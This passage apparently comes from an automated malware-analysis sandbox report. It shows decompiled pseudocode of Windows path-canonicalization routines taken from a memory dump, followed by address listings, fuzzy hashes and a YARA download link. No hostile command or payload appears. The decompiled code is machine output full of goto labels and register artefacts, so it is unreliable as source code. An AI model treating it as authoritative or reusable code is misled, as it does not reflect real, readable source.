														L80:
														E1E3D9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1e381080;
														_v72 =  *0x1e381080;
														__eax =  *0x1e381084;
														_v68 =  *0x1e381084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E1E3D9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E1E3C746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E1E3EB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                        0x1e3c6e30
                                        0x1e3c6e35
                                        0x1e3c6e37
                                        0x1e3c6e3c
                                        0x1e3c6e47
                                        0x1e3c6e4b
                                        0x1e3c6e50
                                        0x1e3c6e53
                                        0x1e3c6e55
                                        0x1e3c6e5b
                                        0x1e3c6e5f
                                        0x1e3c6e65
                                        0x1e3c6e68
                                        0x1e3c6e6a
                                        0x1e3c6e6d
                                        0x1e3c6e70
                                        0x1e3c6e73
                                        0x1e3c6e76
                                        0x1e3c6e79
                                        0x1e3c6e7c
                                        0x1e3c6e7f
                                        0x1e3c6e84
                                        0x1e3c710f
                                        0x1e3c710f
                                        0x1e3c6e8c
                                        0x1e3c6e8e
                                        0x1e3c6e8e
                                        0x1e3c6e97
                                        0x1e40f5d3
                                        0x1e40f5d3
                                        0x1e3c6e9d
                                        0x1e3c6ea3
                                        0x1e3c6eaa
                                        0x1e3c6ead
                                        0x1e3c6eb2
                                        0x1e3c6eb4
                                        0x1e3c6eb7
                                        0x1e3c7466
                                        0x1e3c7466
                                        0x00000000
                                        0x1e3c6ebd
                                        0x1e3c6ebd
                                        0x1e3c6ec4
                                        0x1e3c6eca
                                        0x1e3c6ecc
                                        0x1e3c6ecf
                                        0x1e3c6ed2
                                        0x1e3c6ede
                                        0x1e40f5df
                                        0x1e40f5e0
                                        0x00000000
                                        0x1e40f5e0
                                        0x1e3c6ee6
                                        0x00000000
                                        0x00000000
                                        0x1e3c6eec
                                        0x1e3c6ef3
                                        0x1e3c7181
                                        0x1e3c6f02
                                        0x1e3c6f02
                                        0x1e3c6f02
                                        0x1e3c6f0b
                                        0x1e3c6f0d
                                        0x1e3c6f10
                                        0x1e3c6f17
                                        0x1e3c6f21
                                        0x1e3c6f24
                                        0x1e3c6f2d
                                        0x1e3c6f31
                                        0x1e3c6f36
                                        0x1e3c6f3d
                                        0x1e3c7413
                                        0x1e3c7416
                                        0x1e3c7419
                                        0x1e3c741c
                                        0x1e3c7421
                                        0x1e3c742b
                                        0x1e3c742b
                                        0x1e3c742e
                                        0x1e3c7439
                                        0x1e40f60b
                                        0x1e40f60b
                                        0x1e40f615
                                        0x1e40f619
                                        0x1e3c743f
                                        0x1e3c7447
                                        0x1e3c7454
                                        0x1e3c745a
                                        0x1e3c745f
                                        0x1e3c745f
                                        0x00000000
                                        0x1e3c7439
                                        0x1e3c7425
                                        0x1e40f5e9
                                        0x1e40f5ed
                                        0x1e40f5f4
                                        0x00000000
                                        0x00000000
                                        0x1e40f5fd
                                        0x00000000
                                        0x00000000
                                        0x1e40f603
                                        0x1e40f603
                                        0x00000000
                                        0x1e3c6f43
                                        0x1e3c6f43
                                        0x1e3c6f45
                                        0x1e3c6f48
                                        0x1e3c6f4e
                                        0x1e3c6f65
                                        0x1e3c6f68
                                        0x1e3c721f
                                        0x1e3c6f83
                                        0x1e3c6f86
                                        0x1e3c72dc
                                        0x1e3c72dc
                                        0x1e3c6f9e
                                        0x1e3c6fa1
                                        0x1e3c6fa3
                                        0x1e3c6fa5
                                        0x1e3c6fa8
                                        0x1e3c6fab
                                        0x1e3c6fae
                                        0x1e3c6fb1
                                        0x1e3c6fb4
                                        0x1e3c6fb6
                                        0x1e3c6fb9
                                        0x1e3c6fbf
                                        0x1e3c718a
                                        0x1e3c718e
                                        0x1e40f831
                                        0x1e40f831
                                        0x1e40f833
                                        0x1e40f836
                                        0x00000000
                                        0x1e40f836
                                        0x1e3c7194
                                        0x00000000
                                        0x1e40f658
                                        0x1e40f658
                                        0x1e40f65a
                                        0x1e40f65d
                                        0x1e40f662
                                        0x1e40f662
                                        0x1e40f665
                                        0x1e40f667
                                        0x00000000
                                        0x00000000
                                        0x1e40f669
                                        0x1e40f66c
                                        0x1e40f670
                                        0x1e40f673
                                        0x1e40f67a
                                        0x1e40f67a
                                        0x1e40f67b
                                        0x1e40f67e
                                        0x1e40f681
                                        0x00000000
                                        0x00000000
                                        0x1e40f683
                                        0x1e40f683
                                        0x00000000
                                        0x1e40f683
                                        0x1e40f675
                                        0x1e40f678
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e40f678
                                        0x1e40f686
                                        0x1e40f688
                                        0x1e40f68b
                                        0x1e40f68e
                                        0x1e40f691
                                        0x1e40f694
                                        0x1e40f698
                                        0x1e40f69c
                                        0x1e40f6a0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c7397
                                        0x1e3c739c
                                        0x1e3c739f
                                        0x1e3c73a3
                                        0x1e3c73a5
                                        0x1e40f6bb
                                        0x1e40f6c1
                                        0x1e40f6c4
                                        0x1e3c73ab
                                        0x1e3c73ab
                                        0x1e3c73ab
                                        0x1e3c73b1
                                        0x1e3c73b5
                                        0x1e3c73ba
                                        0x1e3c73c0
                                        0x1e3c73c3
                                        0x1e3c73c7
                                        0x1e3c73cc
                                        0x1e3c73d0
                                        0x1e3c73d3
                                        0x1e40f6cc
                                        0x1e40f6d4
                                        0x1e40f6d9
                                        0x1e40f6dd
                                        0x1e40f6e1
                                        0x1e40f6e5
                                        0x1e40f6f0
                                        0x1e40f6fc
                                        0x1e40f700
                                        0x1e40f709
                                        0x1e40f70e
                                        0x1e40f710
                                        0x1e40f784
                                        0x1e40f788
                                        0x1e40f78b
                                        0x1e40f78e
                                        0x1e40f790
                                        0x1e40f792
                                        0x1e40f795
                                        0x1e40f798
                                        0x1e40f7b7
                                        0x1e40f7b7
                                        0x1e40f7ba
                                        0x1e40f7ba
                                        0x00000000
                                        0x1e40f7ba
                                        0x1e40f79a
                                        0x1e40f79d
                                        0x00000000
                                        0x00000000
                                        0x1e40f79f
                                        0x1e40f7a4
                                        0x1e40f7a7
                                        0x1e40f7ab
                                        0x1e40f7ae
                                        0x1e40f7b1
                                        0x00000000
                                        0x1e40f7b1
                                        0x1e40f712
                                        0x1e40f717
                                        0x1e40f74c
                                        0x1e40f74e
                                        0x1e40f752
                                        0x1e40f756
                                        0x1e40f75d
                                        0x1e40f761
                                        0x1e40f764
                                        0x1e40f76c
                                        0x1e40f771
                                        0x1e40f775
                                        0x1e40f778
                                        0x1e40f77c
                                        0x00000000
                                        0x1e40f77c
                                        0x1e40f719
                                        0x1e40f71d
                                        0x1e40f720
                                        0x1e40f723
                                        0x1e40f726
                                        0x1e40f729
                                        0x1e40f72e
                                        0x1e40f740
                                        0x1e40f744
                                        0x00000000
                                        0x1e40f744
                                        0x1e40f730
                                        0x1e40f732
                                        0x1e40f735
                                        0x1e40f738
                                        0x00000000
                                        0x1e3c73d9
                                        0x1e3c73d9
                                        0x1e3c73db
                                        0x1e3c73de
                                        0x1e3c73e1
                                        0x1e3c73e4
                                        0x1e3c73e7
                                        0x1e3c73ea
                                        0x1e3c73ef
                                        0x1e3c73f2
                                        0x1e3c73f6
                                        0x1e3c73f9
                                        0x1e3c73f9
                                        0x1e3c73fe
                                        0x1e3c7401
                                        0x1e3c7406
                                        0x1e3c7409
                                        0x00000000
                                        0x1e3c7409
                                        0x00000000
                                        0x1e40f7c5
                                        0x1e40f7ca
                                        0x1e40f7cd
                                        0x1e40f7d1
                                        0x1e40f7d3
                                        0x1e40f7da
                                        0x1e40f7e0
                                        0x1e40f7e3
                                        0x1e40f7e3
                                        0x1e40f7e6
                                        0x1e40f7d5
                                        0x1e40f7d5
                                        0x1e40f7d5
                                        0x1e40f7e9
                                        0x1e40f7eb
                                        0x1e40f7f0
                                        0x1e40f7f3
                                        0x1e40f7f5
                                        0x1e40f7f8
                                        0x1e40f7fb
                                        0x1e40f7fe
                                        0x1e40f801
                                        0x1e40f80f
                                        0x1e40f814
                                        0x1e40f803
                                        0x1e40f803
                                        0x1e40f806
                                        0x1e40f806
                                        0x00000000
                                        0x00000000
                                        0x1e3c719d
                                        0x1e3c71a2
                                        0x1e3c71a5
                                        0x1e3c71a9
                                        0x1e3c71ab
                                        0x1e40f826
                                        0x1e40f829
                                        0x1e3c71b1
                                        0x1e3c71b1
                                        0x1e3c71ba
                                        0x1e3c71ba
                                        0x1e3c71bf
                                        0x1e3c71c5
                                        0x1e3c71cf
                                        0x1e3c71d2
                                        0x1e3c71d8
                                        0x1e3c71dd
                                        0x1e3c71e4
                                        0x1e3c71e7
                                        0x00000000
                                        0x00000000
                                        0x1e3c7275
                                        0x1e3c727a
                                        0x1e3c727d
                                        0x1e3c727f
                                        0x1e3c7282
                                        0x1e3c7284
                                        0x1e40f6a8
                                        0x1e40f6aa
                                        0x1e40f6aa
                                        0x1e3c728a
                                        0x1e3c728f
                                        0x1e3c7292
                                        0x1e3c7297
                                        0x1e3c729a
                                        0x1e3c729d
                                        0x1e3c72a0
                                        0x1e3c72a5
                                        0x1e3c72a9
                                        0x1e3c72ac
                                        0x1e3c72af
                                        0x1e3c72b2
                                        0x1e3c72b5
                                        0x1e3c72b7
                                        0x1e3c72ba
                                        0x1e3c72be
                                        0x1e3c72be
                                        0x1e3c72c2
                                        0x1e3c72c5
                                        0x1e3c72c8
                                        0x1e40f6b2
                                        0x1e40f6b2
                                        0x00000000
                                        0x00000000
                                        0x1e3c6fc5
                                        0x1e3c6fc5
                                        0x1e3c6fcc
                                        0x1e3c6fd8
                                        0x1e3c6fda
                                        0x1e3c6fdd
                                        0x1e3c6fe3
                                        0x1e3c7162
                                        0x1e40f845
                                        0x00000000
                                        0x00000000
                                        0x1e40f84e
                                        0x1e40f8c4
                                        0x1e40f8c8
                                        0x1e40f8cb
                                        0x1e40f8ce
                                        0x1e3c70e0
                                        0x1e3c70e0
                                        0x1e3c70e3
                                        0x1e3c70e3
                                        0x1e3c70ea
                                        0x1e3c70ef
                                        0x1e3c70f1
                                        0x1e3c70f4
                                        0x1e3c70fc
                                        0x1e3c70fd
                                        0x1e3c70fe
                                        0x1e3c710c
                                        0x1e3c710c
                                        0x1e40f850
                                        0x1e40f858
                                        0x1e40f87a
                                        0x1e40f88a
                                        0x1e40f88d
                                        0x1e40f890
                                        0x1e40f893
                                        0x1e40f895
                                        0x1e40f898
                                        0x1e40f8a4
                                        0x1e40f8ad
                                        0x1e40f8b0
                                        0x1e40f8b3
                                        0x1e40f8b3
                                        0x1e40f8a4
                                        0x1e3c6fec
                                        0x1e3c6fec
                                        0x1e3c6fee
                                        0x00000000
                                        0x1e3c6ff1
                                        0x1e3c6ff8
                                        0x00000000
                                        0x1e3c6ffe
                                        0x1e3c7004
                                        0x1e3c7006
                                        0x1e3c7006
                                        0x1e3c7010
                                        0x1e3c7017
                                        0x1e3c701e
                                        0x1e3c7072
                                        0x1e3c7074
                                        0x1e3c707e
                                        0x1e3c7083
                                        0x1e3c7087
                                        0x1e3c7088
                                        0x1e3c706c
                                        0x1e3c706c
                                        0x1e3c706d
                                        0x00000000
                                        0x1e3c706d
                                        0x1e3c707c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c707c
                                        0x1e3c7020
                                        0x1e3c7023
                                        0x1e3c71ef
                                        0x1e3c71ef
                                        0x1e3c71f2
                                        0x1e3c71f7
                                        0x00000000
                                        0x00000000
                                        0x1e3c71fd
                                        0x1e3c7200
                                        0x1e3c7205
                                        0x1e3c720b
                                        0x1e3c720e
                                        0x1e3c72eb
                                        0x00000000
                                        0x00000000
                                        0x1e3c72f6
                                        0x00000000
                                        0x1e3c7030
                                        0x1e3c7037
                                        0x1e3c703e
                                        0x1e3c7055
                                        0x1e3c705a
                                        0x1e3c7062
                                        0x1e40f908
                                        0x1e40f90e
                                        0x1e40f90f
                                        0x1e40f90f
                                        0x1e40f908
                                        0x1e3c7062
                                        0x1e3c705a
                                        0x00000000
                                        0x1e3c7045
                                        0x1e3c7045
                                        0x1e3c7049
                                        0x1e3c704a
                                        0x1e3c704d
                                        0x1e3c704e
                                        0x00000000
                                        0x1e3c704e
                                        0x1e3c703e
                                        0x1e3c7068
                                        0x1e3c7069
                                        0x00000000
                                        0x1e3c7069
                                        0x1e3c72fc
                                        0x1e3c7301
                                        0x1e3c7304
                                        0x1e3c7314
                                        0x1e3c7314
                                        0x1e3c7319
                                        0x00000000
                                        0x00000000
                                        0x1e3c7325
                                        0x1e3c732d
                                        0x1e3c7330
                                        0x1e3c7356
                                        0x1e3c7357
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c7332
                                        0x1e3c7332
                                        0x1e3c7337
                                        0x00000000
                                        0x00000000
                                        0x1e3c7343
                                        0x1e3c734b
                                        0x1e3c734e
                                        0x1e3c7361
                                        0x00000000
                                        0x00000000
                                        0x1e3c7367
                                        0x1e3c7367
                                        0x1e3c7368
                                        0x00000000
                                        0x1e3c7368
                                        0x1e3c7350
                                        0x1e3c7351
                                        0x1e3c7351
                                        0x00000000
                                        0x1e3c7332
                                        0x1e40f8f9
                                        0x1e40f8f9
                                        0x1e40f8fa
                                        0x00000000
                                        0x1e40f8fa
                                        0x1e3c7306
                                        0x1e3c730e
                                        0x1e40f8ee
                                        0x00000000
                                        0x00000000
                                        0x1e40f8f4
                                        0x00000000
                                        0x1e3c730e
                                        0x1e3c7214
                                        0x1e3c7214
                                        0x1e3c7217
                                        0x00000000
                                        0x1e3c7217
                                        0x1e3c702c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c702c
                                        0x1e3c708d
                                        0x1e3c7094
                                        0x1e3c7098
                                        0x1e3c70a0
                                        0x1e3c738c
                                        0x1e3c738d
                                        0x1e3c738d
                                        0x1e3c70a0
                                        0x1e3c7098
                                        0x1e3c70a6
                                        0x1e3c70ab
                                        0x1e3c70b3
                                        0x1e3c70b5
                                        0x1e3c70cd
                                        0x1e3c70cd
                                        0x1e3c70d0
                                        0x1e3c70d8
                                        0x1e3c711a
                                        0x1e3c711c
                                        0x1e3c711c
                                        0x1e3c7121
                                        0x00000000
                                        0x00000000
                                        0x1e3c7129
                                        0x00000000
                                        0x00000000
                                        0x1e3c712b
                                        0x1e3c712b
                                        0x1e3c7130
                                        0x1e3c737e
                                        0x1e3c7381
                                        0x00000000
                                        0x1e3c7381
                                        0x1e3c7138
                                        0x00000000
                                        0x00000000
                                        0x1e3c7144
                                        0x1e3c7144
                                        0x1e3c70da
                                        0x1e3c70da
                                        0x1e3c70dd
                                        0x00000000
                                        0x1e3c70dd
                                        0x1e3c70b7
                                        0x1e3c70b8
                                        0x1e3c70bb
                                        0x1e3c70c2
                                        0x00000000
                                        0x00000000
                                        0x1e3c70c7
                                        0x00000000
                                        0x00000000
                                        0x1e3c70c9
                                        0x1e3c70ca
                                        0x00000000
                                        0x1e3c70ad
                                        0x1e3c70ad
                                        0x1e3c70af
                                        0x00000000
                                        0x1e3c70af
                                        0x1e3c7148
                                        0x1e3c714d
                                        0x1e40f8e2
                                        0x1e40f8e2
                                        0x1e3c7153
                                        0x1e3c7154
                                        0x1e3c7157
                                        0x00000000
                                        0x1e3c7157
                                        0x1e40f87c
                                        0x1e40f87f
                                        0x1e40f882
                                        0x00000000
                                        0x1e40f882
                                        0x1e40f85e
                                        0x00000000
                                        0x00000000
                                        0x1e40f864
                                        0x1e40f869
                                        0x1e40f86c
                                        0x00000000
                                        0x1e40f86c
                                        0x1e3c7168
                                        0x1e3c7170
                                        0x1e40f8d6
                                        0x1e40f8d6
                                        0x1e3c7176
                                        0x1e3c7179
                                        0x00000000
                                        0x1e3c7179
                                        0x1e3c6fe9
                                        0x1e3c6fe9
                                        0x00000000
                                        0x1e3c6fe9
                                        0x1e3c6fbf
                                        0x1e3c6f8c
                                        0x1e3c6f93
                                        0x1e3c72d6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c72d6
                                        0x1e3c6f99
                                        0x1e3c6f99
                                        0x1e3c6f99
                                        0x00000000
                                        0x1e3c6f68
                                        0x1e3c6f50
                                        0x1e3c6f56
                                        0x1e3c722c
                                        0x1e40f629
                                        0x1e40f629
                                        0x00000000
                                        0x1e40f629
                                        0x1e3c7232
                                        0x1e3c7239
                                        0x1e40f623
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e40f623
                                        0x1e3c723f
                                        0x1e3c7242
                                        0x1e40f64e
                                        0x1e40f64e
                                        0x00000000
                                        0x1e40f64e
                                        0x1e3c7248
                                        0x1e3c724f
                                        0x1e3c7373
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c7379
                                        0x1e3c7255
                                        0x1e3c7258
                                        0x1e40f63c
                                        0x1e40f648
                                        0x00000000
                                        0x1e40f648
                                        0x1e3c725e
                                        0x1e3c7265
                                        0x1e40f636
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e40f636
                                        0x1e3c726b
                                        0x1e3c726b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c6f56
                                        0x1e3c6f3d
                                        0x1e3c6ed2
                                        0x00000000
                                        0x1e3c6ec4

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
                                        • Instruction ID: f20ac5a1e9a6253d37313d1204386e45cc3efbb22e9c79a707fb6e88634d4e77
                                        • Opcode Fuzzy Hash: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
                                        • Instruction Fuzzy Hash: C2027B71D142698BCB25CFA9C4906ADB7B6BF44700F21436FE816AB294E770DC92CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3C4120, Relevance: .4, Instructions: 444COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E1E3C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1e49d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E1E3DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E1E3C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L1E3C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E1E3C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
